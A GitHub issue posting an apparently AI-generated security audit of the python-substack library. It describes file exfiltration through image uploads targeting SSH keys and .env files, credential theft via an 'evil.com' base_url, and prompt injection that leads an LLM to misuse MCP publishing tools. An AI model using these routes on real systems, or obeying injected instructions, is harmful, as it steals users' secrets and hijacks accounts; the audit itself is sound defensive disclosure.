-
Notifications
You must be signed in to change notification settings - Fork 25
Security Audit: python-substack #44
Description
As I wanted to know if this application was secure, I pushed it through Claude Code on MAX setting. Here are its findings. (most seem harmless to me because the dev should always be in control -- but maybe worth looking into it?)
CRITICAL
1. Arbitrary File Read + Exfiltration via get_image() — api.py:497-516
This is the most dangerous finding. The get_image() method accepts an arbitrary string, checks if it exists on the local filesystem, reads the entire file regardless of type, and uploads it to Substack's servers:
if os.path.exists(image):
with open(image, "rb") as file:
image = b"data:image/jpeg;base64," + base64.b64encode(file.read())
response = self._session.post(f"{self.publication_url}/image", data={"image": image})Attack vectors:
- Malicious Markdown file —
from_markdown()callsapi.get_image(image_url)at lines 619-622 and 641-644. A markdown document containingororwill cause those files to be read, base64-encoded, and uploaded to Substack's image CDN. - Malicious YAML draft —
publish_post.py:65-66callsapi.get_image(item.get("src"))with values straight from the YAML file. - MCP tool —
post_draft_from_markdownpasses markdown tofrom_markdown(markdown, api=client), so a prompt-injection attack against the LLM could inject image references to sensitive files.
Impact: Exfiltration of any file the process can read — SSH keys, cloud credentials, .env secrets, source code, /etc/passwd, etc. The file contents end up as a publicly-accessible image URL on Substack's CDN.
2. SSRF / Credential Theft via base_url — api.py:61
self.base_url = base_url or "https://substack.com/api/v1"No validation at all. If an attacker convinces a user to initialize Api(base_url="https://evil.com/api/v1", email=..., password=...), the login() method at line 145 sends their Substack email and password in cleartext JSON to the attacker's server:
response = self._session.post(
f"{self.base_url}/login",
json={"email": email, "password": password, ...},
)The same session (with cookies) is then used for all subsequent requests, so any response from the evil server that sets cookies would persist.
HIGH
3. MCP Server as Attack Amplifier — mcp_server.py
The MCP server creates a fresh, fully-authenticated Api client on every single tool call (get_api()). It exposes destructive operations:
post_draft_from_markdown— create + publish posts in one callpublish_draft— publish any draft by IDput_draft— arbitrary field updates via**update_payloadkwargs
A prompt-injection attack (malicious content in a webpage, email, or document that an LLM is reading) could instruct the model to call these tools to:
- Publish spam/phishing posts to the user's Substack
- Modify existing drafts with malicious content
- Exfiltrate data via the markdown image path trick (finding Develop #1)
4. put_draft kwargs injection — mcp_server.py:231, api.py:427-430
# MCP tool
return client.put_draft(draft_id, **update_payload)
# Api method
response = self._session.put(
f"{self.publication_url}/drafts/{draft}",
json=kwargs,
)update_payload is an arbitrary Dict[str, Any] passed directly as **kwargs and then as the JSON body. An attacker can inject any field the Substack API accepts — potentially changing post visibility, audience, bylines, or other fields the library doesn't intend to expose.
MEDIUM
5. Insecure Cookie Storage — api.py:180-188
def export_cookies(self, path: str = "cookies.json"):
with open(path, "w") as f:
json.dump(cookies, f)Session cookies (which grant full account access) are written with default file permissions (typically 0644, world-readable). No os.chmod(path, 0o600). Anyone on the system can read them.
6. Unrestricted call() Method — api.py:684-700
def call(self, endpoint, method, **params):
response = self._session.request(
method=method,
url=f"{self.publication_url}/{endpoint}",
params=params,
)endpoint is unsanitized. An attacker controlling it could use path traversal (../../admin/something) to hit arbitrary endpoints on the Substack domain with the user's authenticated session.
7. Silent Auth Failure Swallowing — api.py:165-169
def signin_for_pub(self, publication):
try:
output = Api._handle_response(response=response)
except SubstackRequestException as ex:
output = {}Authentication failures are silently swallowed. This masks conditions where the session is not actually authenticated, leading to undefined behavior or allowing a MitM to silently fail auth while retaining cookies.
8. No Input Validation on publication_url regex — api.py:93
match = re.search(r"https://(.*).substack.com", publication_url.lower())
subdomain = match.group(1) if match else NoneThe .* is greedy and unanchored, so https://evil.com/foo/https://x.substack.com would match with subdomain = "evil.com/foo/https://x". The extracted value is then used to match against publication data, which could cause incorrect publication selection.
LOW
9. Credentials in Process Environment
The MCP server and examples read EMAIL, PASSWORD, COOKIES_STRING from env vars. These are visible in /proc/<pid>/environ to any process running as the same user.
10. No Rate Limiting in delete_all_drafts() — api.py:639-652
Unbounded loop that deletes all drafts. No confirmation, no rate limiting. If triggered accidentally (or via MCP), all drafts are permanently deleted.
Summary Table
| # | Severity | Issue | Location |
|---|---|---|---|
| 1 | CRITICAL | Arbitrary file read + exfiltration | api.py:497-516 |
| 2 | CRITICAL | SSRF / credential theft via base_url |
api.py:61,145 |
| 3 | HIGH | MCP as prompt-injection attack surface | mcp_server.py |
| 4 | HIGH | kwargs injection in put_draft |
mcp_server.py:231 |
| 5 | MEDIUM | World-readable cookie file | api.py:180-188 |
| 6 | MEDIUM | Unvalidated endpoint in call() |
api.py:684-700 |
| 7 | MEDIUM | Silent auth failure swallowing | api.py:165-169 |
| 8 | MEDIUM | Broken regex for publication URL | api.py:93 |
| 9 | LOW | Credentials in environment | mcp_server.py:24-25 |
| 10 | LOW | Unbounded deletion loop | api.py:639-652 |
The #1 finding (file exfiltration via image upload) is the most practically exploitable — a single malicious markdown file or YAML draft is enough to steal secrets from the machine running this library.